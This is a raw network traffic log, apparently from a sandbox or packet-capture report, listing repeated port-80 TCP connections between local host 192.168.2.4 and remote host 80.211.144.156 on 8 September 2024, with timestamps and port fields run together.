                                                          Sep 8, 2024 11:52:48.436470985 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.478257895 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.553889990 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.554590940 CEST6473980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.559154034 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.559273958 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.559432030 CEST806473980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.559501886 CEST6473980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.559653044 CEST6473980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.564434052 CEST806473980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.729125023 CEST6473980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.729737043 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.734616995 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.734690905 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.734797001 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.739660025 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.782047987 CEST806473980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.852349043 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.857327938 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.857451916 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.857590914 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:48.862389088 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.031094074 CEST806473980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.031186104 CEST6473980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.087934971 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.092907906 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.093014956 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.212735891 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.217729092 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.217747927 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.217761040 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.405402899 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.446966887 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.531940937 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.534224033 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.571964979 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.587631941 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.663022041 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.712605953 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.788918972 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.789262056 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.789916992 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.794349909 CEST806474080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.794414043 CEST6474080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.794624090 CEST806474180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.794667959 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:49.794670105 CEST6474180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.794730902 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.794887066 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:49.799686909 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.150235891 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:50.155347109 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.155373096 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.155388117 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.471239090 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.525192976 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:50.670878887 CEST806474280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.712585926 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:50.790179014 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:50.795140028 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:50.795227051 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:50.795362949 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:50.800384998 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.150543928 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.155616045 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.155642033 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.155654907 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.471774101 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.525122881 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.681163073 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.728168011 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.803867102 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.804548979 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.808991909 CEST806474380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.809051037 CEST6474380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.809391022 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:51.809453964 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.809571028 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:51.814304113 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.165838957 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.170799017 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.170810938 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.170825958 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.478072882 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.525108099 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.678463936 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.728233099 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.803311110 CEST6474280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.806931019 CEST6473480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.806997061 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.807033062 CEST4975080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.807476997 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.808300018 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.812958002 CEST806474480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.813004017 CEST6474480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.813036919 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:52.813097000 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.813249111 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:52.818022966 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.166174889 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.171217918 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.171232939 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.171241999 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.480302095 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.525067091 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.612720966 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.665714025 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.740583897 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.741274118 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.745690107 CEST806474580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.745798111 CEST6474580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.746042967 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:53.746119976 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.746280909 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:53.751028061 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.103331089 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.108274937 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.108298063 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.108306885 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.430629969 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.478193045 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.541445971 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.541928053 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.546876907 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.546896935 CEST806474680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.547066927 CEST6474680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.547080994 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.547180891 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.551913023 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.663286924 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.668236017 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.668297052 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.668401957 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.673146009 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.900271893 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:54.908550978 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:54.908567905 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.026333094 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.031420946 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.031435013 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.031452894 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.230669022 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.275079012 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.335742950 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.384423971 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.432596922 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.478310108 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.536885023 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.587622881 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.662314892 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.662585974 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.663081884 CEST6474980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.667536974 CEST806474780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.667604923 CEST6474780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.667817116 CEST806474880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.667859077 CEST6474880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.667886972 CEST806474980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:55.667954922 CEST6474980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.668061972 CEST6474980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:55.672840118 CEST806474980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.309741020 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.309854031 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.310095072 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.315066099 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.665826082 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.670855999 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.670875072 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.670886993 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.977108002 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.025111914 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.180708885 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.228281975 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.245199919 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.245513916 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.250432968 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.250454903 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.250525951 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.250581026 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.252726078 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.257519960 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.303811073 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.304495096 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.309304953 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.309413910 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.310857058 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.315709114 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.350007057 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.665843964 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.670948029 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.670963049 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.670970917 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.732285023 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.732333899 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.177074909 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.193813086 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.193901062 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.197818995 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.197870970 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.324515104 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.325328112 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.329843998 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.329893112 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.330117941 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.330176115 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.330307961 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.335016012 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.681571960 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.686461926 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.686474085 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.686484098 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.003334045 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.056428909 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.208472967 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.259531021 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.334583998 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.335328102 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.339739084 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.339999914 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.340136051 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.340219021 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.340343952 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.345156908 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.697081089 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.702145100 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.702161074 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.702167988 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.004048109 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.056324959 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.212975979 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.259476900 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.335205078 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.335671902 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.340672016 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.340711117 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.340802908 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.340821981 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.340979099 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.345864058 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.697124958 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.702169895 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.702184916 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.702198029 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.008153915 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.056368113 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.136841059 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.181364059 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.255780935 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.256474018 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.260870934 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.260950089 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.261260986 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.261326075 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.261452913 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.266809940 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.618973970 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.623960018 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.623976946 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.623989105 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.955614090 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.009506941 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.088589907 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.134444952 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.209522009 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.210237980 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.215116978 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.215173960 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.215267897 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.215303898 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.215346098 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.220056057 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.307635069 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.307714939 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.312572002 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.312659979 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.312753916 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.317606926 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.353898048 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.429287910 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.434168100 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.434262037 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.434405088 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.443068981 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.665837049 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.670742989 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.670916080 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.688431025 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.688510895 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.790874958 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.795912981 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.795923948 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.795932055 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.976325989 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.025079012 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.104505062 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.115796089 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.150131941 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.165749073 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.393701077 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.446955919 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.521934986 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.522011042 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.522759914 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527111053 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.527266979 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527368069 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.527421951 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527508020 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.527575016 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527678013 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.532409906 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.884573936 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.889616966 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.889633894 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.889642954 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.219105005 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.259589911 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.425755978 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.478231907 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.553214073 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.558208942 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.558315039 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.558459997 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.563266039 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.915808916 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.920775890 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.920789003 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.920798063 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.227173090 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.275100946 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.435189009 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.478290081 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.550920963 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.555850983 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.557145119 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.561029911 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.561125994 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.562016964 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.562113047 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.562295914 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.567051888 CEST806478080.211.144.156192.168.2.4
